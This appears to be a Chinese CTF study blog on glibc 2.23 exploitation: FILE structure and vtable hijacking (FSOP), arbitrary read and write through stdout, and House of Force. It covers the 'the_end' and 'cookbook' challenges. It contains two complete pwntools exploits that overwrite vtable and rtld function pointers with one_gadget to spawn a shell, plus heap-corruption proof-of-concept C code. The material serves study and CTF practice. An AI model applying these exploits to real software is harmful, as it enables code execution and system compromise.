    f 2 7ffff7a8638a _IO_file_xsputn+426
    f 3 7ffff7a8638a _IO_file_xsputn+426
    f 4 7ffff7a5cf94 buffered_vfprintf+308
    f 5 7ffff7a5a32d vfprintf+445
    f 6 7ffff7a62899 printf+153
    f 7 4005e2 main+44
  4. exit->__run_exit_handlers->_IO_cleanup->_IO_flush_all_lockp
    控制stdin、stdout或者stderr,使其满足fp->_mode <= 0以及fp->_IO_write_ptr > fp->_IO_write_base,同时把vtable里面的__overflow(即_IO_OVERFLOW调用的那一项)修改为one gadget(来自raycp师傅的博客)

  5. 程序结束时在_dl_fini中会通过__rtld_lock_lock_recursive宏调用_rtld_global结构体里的_dl_rtld_lock_recursive函数指针(来自raycp师傅的博客),准确来说这个不算FILE里面的,不过还是写一下记一下比较好

自己的调试代码

调试之前写了一个有0x40个a的test.txt(用python -c写进去的,因为无论用vim还是gedit好像都会在保存时自动加一个换行符,比较搞,用cat test.txt|hd就可以看到结尾是不是有换行符)

然后用下面的代码调试了一下…调试细节先放着,这个是帮我用来探索前面几个指针是怎么用的,还有很多细节其实都不太清楚,以后玩源码的时候再来看(结果写题的时候就发现直接用gdb p一下那个符号好像更明确….我佛了,不行就加上(_IO_FILE_plus *)转换一下地址的类型,这样看来代码写的好像多余了2333333)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Dump every field of the stream object behind `tmp` to stderr, followed by
 * the pointer stored directly after the FILE object (the vtable pointer of
 * the enclosing _IO_FILE_plus).
 *
 * Fields are read through the FILE pointer itself. The earlier version cast
 * the pointer to `unsigned int` before adding offsets, which drops the upper
 * 32 bits of a 64-bit address.
 *
 * tmp: stream to inspect; must point at readable memory of at least
 *      sizeof(FILE) + sizeof(void *) bytes. The caller decides whether the
 *      stream is still open.
 */
void printFILE(FILE * tmp)
{
    fprintf(stderr, "_flags:%#x\n", (unsigned int)tmp->_flags);
    fprintf(stderr, "_IO_read_ptr:%p\n", (void *)tmp->_IO_read_ptr);
    fprintf(stderr, "_IO_read_end:%p\n", (void *)tmp->_IO_read_end);
    fprintf(stderr, "_IO_read_base:%p\n", (void *)tmp->_IO_read_base);
    fprintf(stderr, "_IO_write_base:%p\n", (void *)tmp->_IO_write_base);
    fprintf(stderr, "_IO_write_ptr:%p\n", (void *)tmp->_IO_write_ptr);
    fprintf(stderr, "_IO_write_end:%p\n", (void *)tmp->_IO_write_end);
    fprintf(stderr, "_IO_buf_base:%p\n", (void *)tmp->_IO_buf_base);
    fprintf(stderr, "_IO_buf_end:%p\n", (void *)tmp->_IO_buf_end);
    fprintf(stderr, "_IO_save_base:%p\n", (void *)tmp->_IO_save_base);
    fprintf(stderr, "_IO_backup_base:%p\n", (void *)tmp->_IO_backup_base);
    fprintf(stderr, "_IO_save_end:%p\n", (void *)tmp->_IO_save_end);
    fprintf(stderr, "_markers:%p\n", (void *)tmp->_markers);
    fprintf(stderr, "_chain:%p\n", (void *)tmp->_chain);
    fprintf(stderr, "_fileno:%#x\n", (unsigned int)tmp->_fileno);
    fprintf(stderr, "_flags2:%#x\n", (unsigned int)tmp->_flags2);
    /* _old_offset is wider than int, so print it at full width. */
    fprintf(stderr, "_old_offset:%#llx\n", (unsigned long long)tmp->_old_offset);
    fprintf(stderr, "_cur_column:%#x\n", (unsigned int)tmp->_cur_column);
    fprintf(stderr, "_vtable_offset:%#x\n", (unsigned int)tmp->_vtable_offset);
    fprintf(stderr, "_shortbuf:%#x\n", (unsigned int)tmp->_shortbuf[0]);
    /* _lock is a pointer; show the whole pointer rather than its low 32 bits. */
    fprintf(stderr, "_lock:%p\n\n", (void *)tmp->_lock);

    /* The vtable pointer is the word immediately after the FILE object. */
    fprintf(stderr, "vatable*:%p\n\n", *(void **)((char *)tmp + sizeof(*tmp)));
}
/*
 * Walk one stream through fopen / fread / fwrite / fflush / fclose on
 * "test.txt" and dump its FILE object with printFILE() after each step.
 *
 * Returns 0 on success, 1 if test.txt cannot be opened.
 *
 * Note: reads and writes are issued back to back without an intervening
 * fseek/fflush in places. That is kept as-is because the point of the demo is
 * to observe how the buffer pointers move.
 */
int main(){
    fprintf(stderr, "Let's see what FILE* have(x64):\n");
    fprintf(stderr, "The fopen will malloc a chunk to store the FILE structure and return a ptr to the structure chunk\n");
    fprintf(stderr, "Let's do fopen\n");
    FILE *f=fopen("test.txt","r+");
    if (f == NULL) {
        /* Without the input file every later step would dereference NULL. */
        perror("fopen test.txt");
        return 1;
    }
    fprintf(stderr, "And we can see what exactly the structure have at the beginning:\n");
    printFILE(f);

    fprintf(stderr, "Then we read something from the file(0x20)\n");
    char buffer[0x30]={0};
    fread(buffer,1,0x20,f);
    /* strlen() returns size_t, so use the z length modifier. */
    fprintf(stderr, "buffer<%s><%#zx>\n",buffer,strlen(buffer));
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    memset(buffer,0,0x30);
    strcpy(buffer,"bbbbbbbbbbbbbbbb");
    fprintf(stderr, "Then we write something to the file('b'*0x10)\n");
    fwrite(buffer,1,strlen(buffer),f);
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    fprintf(stderr, "Try fflush\n");
    fflush(f);
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    memset(buffer,0,0x30);
    fprintf(stderr, "Read again(0x20)\n");
    fread(buffer,1,0x20,f);
    fprintf(stderr, "buffer<%s><%#zx>\n",buffer,strlen(buffer));
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    memset(buffer,'*',0x30);
    fprintf(stderr, "Write again('*'*0x20)\n");
    fwrite(buffer,1,0x20,f);
    fprintf(stderr, "Now the FILE looks like:\n");
    printFILE(f);

    fflush(f);

    fclose(f);
    /* Deliberate use-after-free: shows what the freed FILE chunk contains. */
    fprintf(stderr, "Now the FILE looks like(Use after free):\n");
    printFILE(f);
    return 0;
}

其中最主要的大概是fopen时malloc了一个0x230的chunk来存放结构体,然后第一次调用fread时分配了一个0x1000的文件缓冲区,第一次会把文件的全部内容都读到这个缓冲区里面(正确与否有待深究,自己看来暂时是这样)

1582612886398

_chain域的链接此时结构大概是:_IO_list_all->f->_IO_2_1_stderr_->_IO_2_1_stdout_->_IO_2_1_stdin_->NULL

其中_IO_list_all是一个变量,存储着指向f结构体的指针(以上图为例就是0x603010),f在fopen操作时初始化的FILE*就被链入了这个链表

再就是fclose会直接把对应的两个chunk一起释放了,释放顺序是先释放文件缓冲区再释放结构体chunk

Hijack

至于vtable在_IO_FILE_plus中的偏移量,摘自wiki就是:在 libc2.23 版本下,32 位的 vtable 偏移为 0x94,64 位偏移为 0xd8(wiki)

如果我们伪造一个vtable,然后修改对应FILE结构体的vtable指针指向我们伪造的vtable,就可以达到劫持程序的目的(不得不说vtable大法好啊23333)

目前 libc2.23 版本下,位于 libc 数据段的 vtable 是不可以进行写入的。不过,通过在可控的内存中伪造 vtable 的方法依然可以实现利用(wiki)

vtable对应的段属性如下所示,在不可写段:

1582618757197

(wiki上面关于修改vtable的描述已经很详细了,这里不再赘述,主要是以记笔记为主)

因为 vtable 中的函数调用时会把对应的_IO_FILE_plus指针作为第一个参数传递,因此这里我们把 “sh” 写入_IO_FILE_plus 头部。之后对 fwrite 的调用就会经过我们伪造的 vtable 执行 system(“sh”)
(或者直接试着填one_gadget

leak

(来自raycp师傅的博客)

控制stdout结构体满足以下条件实现任意泄露:

  • _IO_write_base指向想要泄露的地方。
  • _IO_write_ptr指向泄露结束的地址。
  • _IO_read_end等于_IO_write_base以绕过多余的代码。 满足这三个条件,可实现任意读。当然不包含结构体里的_flags字段的伪造,该字段都从原来的结构体里面复制过来,所以就没去分析该如何构造了。

Arbitrary write

(来自raycp师傅的博客)

_IO_write_end 大于_IO_write_ptr时,memcpy就会调用

只需要将_IO_write_ptr指向需要写的地址,_IO_write_end指向结束位置即可

有了任意读与任意写之后,具体实现就是使用任意读泄露libc地址,然后用任意写将one gadget写到malloc_hook中,然后利用%n报错或者是较大的字符打印来触发malloc函数

the_end

只看概念当然不代表会用了,肯定要写个题印象才深23333

程序分析

1582615573201

程序逻辑非常简单,就是给了一个libc地址,然后任意地址写5次,一次一字节,但是程序开启了PIE和Full RELRO,无法改写程序段的内容,这里我由于是第一次写FILE类型的题,所以就参考了师傅们的WP学了很多(看完的感触就是挖洞果然撸源码是王道啊….)

当然还有从各路师傅那听来的Ex师傅的博客,真的学到了不少东西

Exploit1

第一种办法是修改stdin/stdout/stderr任一FILE的vtable指针指向我们可控的区域,由于ubuntu libc2.23存放vtable的段不可写,所以不能直接改vtable。改指针的时候也特别巧妙,改的是指针第二个字节,所以可以在可写的段再去找合适的偏移,当然这里的解法都是参考raycp师傅学的新姿势,所以更清晰明了的解释就推荐去看原博主的文了

这个方法里面一共改了三处,5次:
第一处:stdin/stdout/stderr任一FILE的 _IO_write_ptr,使其大于_IO_write_base
第二处:对应vtable指针第二字节,改写的地址对应偏移需要有libc地址
第三处:对应偏移处有libc地址,修改低三字节

可能自己接触比较新的就是在libc找合适的地方去改地址
我用的命令是 search -p 0x7fxxxx -w,在GDB里面可以直接找到可写的而且有这个地址的内存,然后通过我们需要的偏移比对哪个地址是我们需要的,因为vtable里面是存在偏移的,如果实在是找不到可能就失败了,当然找到的概率还是很大的,毕竟师傅们的利用都这么多了XD

ps:原来这个就是FSOP,开始还以为FSOP是更深一点的知识,然后点开wiki的FSOP之后发现就是这个23333,一举两得?

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# --- target / process setup -------------------------------------------------
binary = './the_end' #binary's name here
context.binary = binary #context here
context.log_level='debug'
# The target is driven through a pty for both stdin and stdout.
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Unpack a possibly short leak by zero-padding it to the full word width.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log `what` followed by `address` in hex, highlighted with ANSI colour."""
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)

'''
# todo here
def writeByte(address,Byte):
    """Use one of the target's one-byte writes: store `Byte` at `address`.

    The address goes out as 8 packed bytes, then the byte itself. The short
    sleeps keep the two sends from being coalesced into a single read.
    """
    p.send(p64(address))
    sleep(0.1)
    p.send(Byte)
    sleep(0.1)

# The program prints the address of sleep() as a "gift"; rebase libc from it.
p.recvuntil('here is a gift ')
libc_base=int(p.recv(len('0x7f4ec6b9d230')),16)-libc.symbols['sleep']
loginfo('libc_base',libc_base)
'''stdout
stdout_IO_write_ptr=0x3c5648
stdout_vtable_off=0x3c56f8
address_off=0x3c53e0
func_off=0x3c53f8
'''
# libc offsets for the stdin variant: its _IO_write_ptr field, its vtable
# pointer, the writable location used as the fake vtable (address_off), and
# that table's fourth slot (func_off = address_off + 0x18, i.e. __overflow).
stdin_IO_write_ptr=0x3c4908
stdin_vtable_off=0x3c49b8
address_off=0x3c53e0
func_off=0x3c53f8

#gdb.attach(p,'brva 0x950')
# Write 1 of 5: make _IO_write_ptr greater than _IO_write_base.
writeByte(stdin_IO_write_ptr+libc_base,'\xff')
# Write 2 of 5: patch only the second byte of the vtable pointer so that it
# points at address_off.
off=address_off+libc_base
off=(off>>8)&0xff
off=chr(off)
writeByte(stdin_vtable_off+libc_base+1,off)
# Writes 3-5: replace the low three bytes of the libc pointer already stored
# in the fake __overflow slot with those of the one-gadget.
one_off=0xf1147+libc_base
one_off1=chr(one_off&0xff)
one_off2=chr((one_off&0xff00)>>8)
one_off3=chr((one_off&0xff0000)>>16)

writeByte(func_off+libc_base,one_off1)
writeByte(func_off+libc_base+1,one_off2)
writeByte(func_off+libc_base+2,one_off3)

p.interactive()

Exploit2

第二种方法真的是让我感受到了函数指针的伟大23333,简直是Control the ptr ,control the world,这些利用都太奇妙了,再就是源码大法好,以后一定要多看看源码

这里是直接修改的_rtld_global._dl_rtld_lock_recursive这个函数指针….甚至只需要修改这个指针的低三个字节就可以了…真的tql,被师傅们强大到,以后菜鸡一定多看看源码

直接放exp吧都没什么好写的了23333

完整exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

# --- target / process setup -------------------------------------------------
binary = './the_end' #binary's name here
context.binary = binary #context here
context.log_level='debug'
# The target is driven through a pty for both stdin and stdout.
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

# Unpack a possibly short leak by zero-padding it to the full word width.
my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
    """Log `what` followed by `address` in hex, highlighted with ANSI colour."""
    log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
# todo here
def writeByte(address,Byte):
    """Use one of the target's one-byte writes: store `Byte` at `address`.

    The address goes out as 8 packed bytes, then the byte itself. The short
    sleeps keep the two sends from being coalesced into a single read.
    """
    p.send(p64(address))
    sleep(0.1)
    p.send(Byte)
    sleep(0.1)

# The program prints the address of sleep() as a "gift"; rebase libc from it.
p.recvuntil('here is a gift ')
libc_base=int(p.recv(len('0x7f4ec6b9d230')),16)-libc.symbols['sleep']
loginfo('libc_base',libc_base)

# Offset (from libc base) of the function pointer to overwrite; per the
# article this is _rtld_global._dl_rtld_lock_recursive - verify for your setup.
ptr_off_set=0x5f0f48
one_gadget=0xf02a4+libc_base
# Only the low three bytes of the existing pointer need replacing.
off1=one_gadget&0xff
off2=(one_gadget&0xff00)>>8
off3=(one_gadget&0xff0000)>>16
#gdb.attach(p,'brva 0x950')
# The target performs exactly five one-byte writes; only three are needed, so
# the first byte is written three times to use up the remaining two.
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set,chr(off1))
writeByte(libc_base+ptr_off_set+1,chr(off2))
writeByte(libc_base+ptr_off_set+2,chr(off3))


p.interactive()

how2heap - house_of_force&cookbook、bcloud

ubuntu16.04 libc2.23

house_of_force.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
/*
This PoC works also with ASLR enabled.
It will overwrite a GOT entry so in order to apply exactly this technique RELRO must be disabled.
If RELRO is enabled you can always try to return a chunk on the stack as proposed in Malloc Des Maleficarum
( http://phrack.org/issues/66/10.html )
Tested in Ubuntu 14.04, 64bit.
*/


#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/* Overwrite target for the demo. It has an initializer, so despite its name
 * it is typically placed in .data rather than .bss. */
char bss_var[] = "This is a string that we want to overwrite.";

/*
 * House of Force walkthrough:
 *   1. allocate one chunk so the top chunk sits right behind it,
 *   2. simulate an overflow that sets the top chunk's size to -1,
 *   3. malloc(evil_size) so the top chunk pointer lands just before bss_var,
 *   4. malloc(100) then returns memory overlapping bss_var, which is overwritten.
 * Progress is narrated on stderr. argc/argv are unused.
 */
int main(int argc , char* argv[])
{
fprintf(stderr, "\nWelcome to the House of Force\n\n");
fprintf(stderr, "The idea of House of Force is to overwrite the top chunk and let the malloc return an arbitrary value.\n");
fprintf(stderr, "The top chunk is a special chunk. Is the last in memory "
"and is the chunk that will be resized when malloc asks for more space from the os.\n");

fprintf(stderr, "\nIn the end, we will use this to overwrite a variable at %p.\n", bss_var);
fprintf(stderr, "Its current value is: %s\n", bss_var);



fprintf(stderr, "\nLet's allocate the first chunk, taking space from the wilderness.\n");
intptr_t *p1 = malloc(256);//0x100
/* p1 - 2 steps back two words from the user pointer, i.e. to the chunk header. */
fprintf(stderr, "The chunk of 256 bytes has been allocated at %p.\n", p1 - 2);

fprintf(stderr, "\nNow the heap is composed of two chunks: the one we allocated and the top chunk/wilderness.\n");
int real_size = malloc_usable_size(p1);
fprintf(stderr, "Real size (aligned and all that jazz) of our allocated chunk is %ld.\n", real_size + sizeof(long)*2);

fprintf(stderr, "\nNow let's emulate a vulnerability that can overwrite the header of the Top Chunk\n");

//----- VULNERABILITY ----
/* The last word of p1's usable area is where the next chunk (the top chunk)
 * begins; its size field is one word further on. */
intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size - sizeof(long));
fprintf(stderr, "\nThe top chunk starts at %p\n", ptr_top);

fprintf(stderr, "\nOverwriting the top chunk size with a big value so we can ensure that the malloc will never call mmap.\n");
fprintf(stderr, "Old size of top chunk %#llx\n", *((unsigned long long int *)((char *)ptr_top + sizeof(long))));
/* -1 reads back as the largest possible unsigned size. */
*(intptr_t *)((char *)ptr_top + sizeof(long)) = -1;
fprintf(stderr, "New size of top chunk %#llx\n", *((unsigned long long int *)((char *)ptr_top + sizeof(long))));
//------------------------

fprintf(stderr, "\nThe size of the wilderness is now gigantic. We can allocate anything without malloc() calling mmap.\n"
"Next, we will allocate a chunk that will get us right up against the desired region (with an integer\n"
"overflow) and will then be able to allocate a chunk right over the desired region.\n");

/*
* The evil_size is calulcated as (nb is the number of bytes requested + space for metadata):
* new_top = old_top + nb
* nb = new_top - old_top
* req + 2sizeof(long) = new_top - old_top
* req = new_top - old_top - 2sizeof(long)
* req = dest - 2sizeof(long) - old_top - 2sizeof(long)
* req = dest - old_top - 4*sizeof(long)
*/
/* Unsigned arithmetic: when bss_var lies below the heap the subtraction wraps
 * around, which is the "integer overflow" mentioned in the message above. */
unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*4 - (unsigned long)ptr_top;
fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size,\n"
"we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
void *new_ptr = malloc(evil_size);
fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr - sizeof(long)*2);

/* This request is expected to come back overlapping bss_var. */
void* ctr_chunk = malloc(100);
fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer.\n");
fprintf(stderr, "malloc(100) => %p!\n", ctr_chunk);
fprintf(stderr, "Now, we can finally overwrite that value:\n");

fprintf(stderr, "... old string: %s\n", bss_var);
fprintf(stderr, "... doing strcpy overwrite with \"YEAH!!!\"...\n");
strcpy(ctr_chunk, "YEAH!!!");
fprintf(stderr, "... new string: %s\n", bss_var);


// some further discussion:
//fprintf(stderr, "This controlled malloc will be called with a size parameter of evil_size = malloc_got_address - 8 - p2_guessed\n\n");
//fprintf(stderr, "This because the main_arena->top pointer is setted to current av->top + malloc_size "
// "and we \nwant to set this result to the address of malloc_got_address-8\n\n");
//fprintf(stderr, "In order to do this we have malloc_got_address-8 = p2_guessed + evil_size\n\n");
//fprintf(stderr, "The av->top after this big malloc will be setted in this way to malloc_got_address-8\n\n");
//fprintf(stderr, "After that a new call to malloc will return av->top+8 ( +8 bytes for the header ),"
// "\nand basically return a chunk at (malloc_got_address-8)+8 = malloc_got_address\n\n");

//fprintf(stderr, "The large chunk with evil_size has been allocated here 0x%08x\n",p2);
//fprintf(stderr, "The main_arena value av->top has been setted to malloc_got_address-8=0x%08x\n",malloc_got_address);

//fprintf(stderr, "This last malloc will be served from the remainder code and will return the av->top+8 injected before\n");
}

这里面最重要的应该就是这个计算过程了,我把步骤解释写一下:

1
2
3
4
5
6
7
8
9
#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
new_top = old_top + nb
//remainder = ↑chunk_at_offset (victim, nb);源码中这里remainder对应的就是new_top,victim此时就是old_top

nb = new_top - old_top
req + 2sizeof(long) = new_top - old_top//这里分解nb
req = new_top - old_top - 2sizeof(long)
req = dest - 2sizeof(long) - old_top - 2sizeof(long)//dest = new_top + 2sizeof(long)
req = dest - old_top - 4*sizeof(long)

其中最主要的是通过chunk_at_offset(p, s)这个Macro来计算remainder(也就是新的top chunk)的时候,nb为负数时会把topchunk的位置往回放

但是_int_malloc最开始对我们申请的bytes做的检查是这样的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/* True when a request is so large that padding it would wrap around. */
#define REQUEST_OUT_OF_RANGE(req)                                 \
((unsigned long) (req) >= \
(unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
// MINSIZE: 0x20 on x64, 0x10 on x86
// -2*MINSIZE = 0xFFFF FFFF FFFF FFC0 (x64), 0xFFFF FFE0 (x86)
// req is converted to unsigned long; a request only has to stay below this
// bound to get past the first check.
/* pad request bytes into a usable size -- internal version */

#define request2size(req) \
(((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? \
MINSIZE : \
((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)

/* Same, except also perform argument check */

/* Note: expands to statements, including a `return 0` in the enclosing
 * function when the request is out of range. */
#define checked_request2size(req, sz) \
if (REQUEST_OUT_OF_RANGE (req)) { \
__set_errno (ENOMEM); \
return 0; \
} \
(sz) = request2size (req);

然后用一个负数的nb去topchunk申请chunk,当然其中经过smallbin range检查的时候还调用了malloc_consolidate

用topchunk的size和nb作比对的时候都是转换成了unsigned long:此时-1计算出来的size是最大的,可以通过该检查:(unsigned long) (size) >= (unsigned long) (nb + MINSIZE)

Debug

先不急着debug示例程序,我自己准备用自己的程序试一试,具体如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>	/* int64_t */

/*
 * Minimal House of Force experiment: move the top chunk *backwards*.
 *
 * After the top chunk's size is forced to -1, a request of
 * -0x1000 - 2*sizeof(size_t) moves the top chunk 0x1000 bytes back onto the
 * chunk behind `p`, so the following malloc(0x100) is expected to return the
 * same address as `p`. This corrupts the heap on purpose and relies on the
 * glibc 2.23 allocator layout; it is not portable C.
 */
int main(int argc , char* argv[])
{
    char *fast=malloc(0x20);
    char *p=malloc(0xff0);
    free(fast);//use for test
    /* p + 0xff8 is the size field of the top chunk that follows p's chunk. */
    *(int64_t *)(p+0xff8)=(long long)-1;//set top_chunk size

    char *p2=malloc(0xFFFFFFFFFFFFF000-2*sizeof(size_t));//set new_top
    (void)p2;	/* only the side effect on the top chunk matters */
    char *p3=malloc(0x100);//the same address as p
    /* %p expects void *. */
    printf("%p,%p",(void *)p,(void *)p3);
    return 0;
}

这里我写了一个简单的程序,其中0x30的chunk是用来debug的时候看是否调用了malloc_consolidate

设置top_chunk size之后:

可以看到pwndbg的脚本报错了,不过我们直接看地址偏移还是一样的

然后char *p2=malloc(0xFFFFFFFFFFFFF000-2*sizeof(size_t));这一行的意思是传入一个-0x1000-2*size_t的值,计算nb时会补成-0x1000,通过两道检查后在源码中这里:remainder = chunk_at_offset (victim, nb),remainder是用来设置新的top_chunk的,所以我们直接就把top_chunk往回放到我们之前申请的0x1000的chunk处去了。

因为chunksize计算时会除去低三位,所以remainder_size = size - nb;这一步中的size实际上是0xfffffffffffffff8
,减去nb(-0x1000)之后就变成了0xff8,如果我们想要之后的top_chunk能再大一些显然做不到了,因为要通过(unsigned long) (size) >= (unsigned long) (nb + MINSIZE)这个检查

再就是设置top_chunk size的时候,虽然说计算size时低三位是没用的,但是最后一位必须为1,要不然在_libc_malloc里面的arena_get好像会出问题(待深入)

以上内容执行时如下:

可以看到新的top_chunk已经被设置成了我们之前0x1000 chunk的地址

最后的运行效果就是这样:

1582043111462

两个指针指向的chunk是一样的,也验证了req = dest - old_top - 4*sizeof(long)


然后再来debug示例代码(这里很简略)

所以上面示例代码中把topchunk的size改成了-1,然后计算出的evil_size=0xffffffffffafcf30当然也通过了检查

可以看到这里算出来的remainder就是0x602050了,刚好是我们字符串地址-0x10的位置,所以再malloc的时候就可以malloc出这块内存,至于后面注释的那一部分,大致意思就差不多是我们可以通过这个方法来修改GOT表,暂时就不debug了

当然这上面是因为没有开ASLR,bss和top_chunk比较近,如果开启PIE加上ASLR的效果也是一样的:

一样申请到了这块内存

接下来肝题吧

cookbook

程序分析

emmm…怎么说呢,感觉以后分析这种程序得换换思路了,以前都是拿着题就往IDA拖了分析,现在看来程序复杂度够高的时候直接这样分析好像不太行,工作量太大,而且根本没有思路,对于量大一点的题得先跑熟悉有个印象再去写,熟悉逻辑之后再去逆会快很多

下面就写一些大致的,后面会放一个总结的图,说不定以后程序分析就都是总结的图了,因为程序每个细节都扣到会浪费时间,能找到漏洞然后利用才是王道啊

main

1582247560625

main大致对应的就是这些东西,Rec代表recipe,Ing代表Ingredient,main_menu是我们操作主菜单,之前做的都是初始化操作

init_RecAndIng

这个函数分为两个子函数,第一个差不多是下面这样子的,主要做初始化Ingredient的操作

add_ingredient会calloc(0x90)一个Ingredient的结构体,等下放一张图给自己看吧

Ingredient_ListHeader是存在.bss段上的一个链表头指针。LinkList_add就是往这个头指针添加结点,calloc(0x8),然后存一个next指针一个数据

第二个子函数就是初始化三个recipe(0x40C),当时直接拿着程序看的时候在这浪费了很多时间,因为根本不知道要干什么,以后碰到这种就先跑一下程序熟悉熟悉,看这些字符串出现在什么地方再逆,ret_Ingredient_ptr是根据name返回对应Ingredient结构体的指针Dish type应该不用管

不过这两个初始化函数用来逆结构体还是挺好的,这里把结构体放出来吧

struct

再来看main_menu

就是我们正常的菜单选择了,这里就不做细致分析了,没必要,我下面的这张图记录了每个函数大致的操作

All in one

1582249392325

所有对应的选项我都记录了大致对应的操作,当然也不乏在调试中发现的一些小细节,比如create recipe里面是删不掉Ingredient的,因为fgets读入的结尾\n程序没有处理,导致strcmp比对失败…

最后程序通过链表和不同结构体的管理如下图所示,我这里只拿了一个Ingredient和Recipe做示例

1582213398090

漏洞分析&Exploit

leak

这个题的leak其实只要有经验的话应该马上就能想到,没有经验的话像我可能还稍微想了一段时间吧,当然也要注意这里面的chunk很多都是calloc出来的。当时我在想leak构造的时候第一反应是:create recipe里面free时没有把current_ptr置0,所以留下了一个悬空指针(UAF),然后就可以打印出对应的东西,这里只有一个recipe chunk被free的时候就可以打印出来这个unsortedbin chunk上的*(*bk)处的值,这里是top_chunk的地址。

后来我想通过remove ingredient来给ingredient chunk的fd和bk处放上libc地址结果失败了,因为我发现这里根本删不了..坑,还以为是出了什么问题,不过依旧是这个思路,由于我们current_ptr是保存在.bss上的,所以我们可以先退出去删掉这个ingredient,之后再回到这里leak,这样在打印price的时候就会leak出libc地址了,注意数量一定要设置为1

Arbitrary write

本题还有一个0x8C的大overflow我们没有用到,最开始我想的是能不能通过fastbin来attack一个地方,后来发现没什么思路就放弃了,因为house_of_force的方法在这里更明显一些,我们可以直接通过这个大overflow来修改top_chunk然后改写GOT表,最后调用system("/bin/sh")。当然改GOT表的过程特别玄学,由于只有Ingredient和cookbook name是malloc出来的,而bookname在我这个方法里面要在设置top_size之后用来设置new top的位置,所以我这里不能用bookname来更改GOT表,只能用Ingredient,但是调试过程中确实踩了很多坑,最后对应ingredient的位置很苛刻

从前往后试这两个地方用来在设置topchunk的时候写size,前面的内存是不可写的(这里写一笔给记性差的自己:因为32位chunk要8字节对齐,所以只有结尾是4和C的地方才能写size),而后malloc ingredient时因为输入Ingredient->name的时候程序会calloc一块chunk出来,也就意味着0x98Bytes后的数据全部会被清零,所以很多数据都会受到连锁影响(跪。而且我试0x0804D004这个地方的时候发现,后面的malloc居然刚好把currentIng_ptr给设置成size字段了,以后在这些数据段操作之前一定先看看后面的一些特殊偏移有什么数据(….&currentIng_ptr-0x0804D000=0x9C(malloc_usable_size))出题人应该是故意这么苛刻的?
